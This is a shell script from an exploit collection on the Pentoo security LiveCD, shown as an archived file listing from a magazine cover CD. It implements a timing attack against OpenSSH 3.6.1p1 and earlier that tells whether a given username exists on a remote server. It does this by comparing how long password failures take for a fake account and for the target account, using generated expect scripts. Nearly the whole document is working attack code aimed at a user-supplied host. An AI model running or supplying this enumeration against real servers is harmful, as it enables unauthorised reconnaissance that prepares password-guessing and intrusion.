home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / application / ssh / openssh / gossh.sh < prev    next >
Linux/UNIX/POSIX Shell Script  |  2005-02-12  |  3KB  |  139 lines
  1. #!/bin/sh
  2. # OpenSSH <= 3.6.1p1 - User Identification.
  3. # Nicolas Couture - nc@stormvault.net
  4. #
  5. # Description:
  6. #    -Tells you wether or not a user exist on
  7. #      a distant server running OpenSSH.
  9. # Usage:
  10. #    -You NEED to have the host's public key
  11. #      before executing this script. 
  12. #
  13.  
  14.  
  15. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
  16. # Fact Sheet:                    #
  17. #      o It is really accurate against    #
  18. #        redhat boxes.            #
  19. #       o Linux boxes running grsecurity    #
  20. #        has 10 seconds delay on both    #
  21. #        valid AND invalid user login    #
  22. #        attempts.                #
  23. #      o *BSD boxes are not vulnerables and  #
  24. #         always has 10 seconds delay like   #
  25. #         Linux-Grsec + network protection   #
  26. #                        #
  27. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
  28.  
  29. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
  30. # History:                    #
  31. #     Thu May  1 15:41:18 EDT 2003         #
  32. #      ; Script started.            #
  33. #     Thu May  1 16:42:30 EDT 2003        #
  34. #      ; Script is functional.        #
  35. #=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=#
  36.  
  37. # Let the user know how we work.
  38. usage(){
  39.  echo "$0 <user> <host>"
  40.  exit 1
  41. }
  42.  
  43. # Verify the arguments.
  44. [ $# != 2 ] && usage
  45.  
  46. # Variables.
  47. USER="$1"
  48. HOST="$2"
  49.  
  50. #=-=-=-=-=-=-=-=-=-=-=-=-=#
  51. # Expect script functions #
  52. #=-=-=-=-=-=-=-=-=-=-=-=-=#
  53.  
  54. # Expect script for password.
  55. expasswd() {
  56. cat << EOF > expasswd 
  57. spawn $SSHCMD
  58. expect password:
  59. send '\r'
  60. interact
  61. EOF
  62. }
  63.  
  64. # Expect script for error.
  65. experror() {
  66. cat << EOF > experror
  67. spawn expect -f expasswd
  68. expect again.
  69. exit 1593
  70. interact
  71. EOF
  72. }
  73.  
  74. #=-=-=-=-=-=-=-=-=-=#
  75. # -Fake user timing #
  76. #=-=-=-=-=-=-=-=-=-=#
  77.  
  78. # OpenSSH client command for inexisting user.
  79. export SSHCMD="ssh nicolas_couture@$HOST"
  80.  
  81. # Build new expect script.
  82. expasswd
  83. experror
  84.  
  85. # Timing.
  86. FDATE0=`date '+%s'`
  87. echo "[-] Calculating fake user timeout..."
  88. expect -f experror 1> /dev/null 2> /dev/null
  89. FDATE1=`date '+%s'`
  90.  
  91. # Fake user timeout.
  92. FUTO=`echo $FDATE1 - $FDATE0 | bc`
  93. echo "[+] Found $FUTO."
  94.  
  95. #=-=-=-=-=-=-=-=#
  96. # -$USER timing #
  97. #=-=-=-=-=-=-=-=#
  98.  
  99. # OpenSSH command.
  100. export SSHCMD="ssh $USER@$HOST"
  101.  
  102. # Build new expect scripts.
  103. expasswd
  104. experror
  105.  
  106. DATE0=`date '+%s'`
  107. echo "[-] Calculating $USER timeout on $HOST..."
  108. expect -f experror 1> /dev/null 2> /dev/null
  109. DATE1=`date '+%s'`
  110.  
  111. # $USER timeout.
  112. END=`echo $DATE1 - $DATE0 | bc`
  113. echo "[+] Found $END."
  114.  
  115. #=-=-=-=-=#
  116. # -Result #
  117. #=-=-=-=-=#
  118.  
  119. if [ "$FUTO" -eq "$END" ] && [ "$FUTO" -eq "10" ]; then
  120.  echo "This box is not vulnerable."
  121.  exit 1
  122. fi
  123.  
  124. # Use of our magic skills.
  125. if [ "$FUTO" -lt "$END" ]; then
  126.  echo "$USER exist on $HOST."
  127. elif [ "$FUTO" -ge "$END" ]; then
  128.  echo "$USER doesn't exist on $HOST."
  129. else
  130.  echo "Segmentation fault."
  131.  exit 13
  132. fi
  133.  
  134. # Remove tmp files.
  135. rm -rf expasswd experror
  136.  
  137. # EOF
  138.  
  139.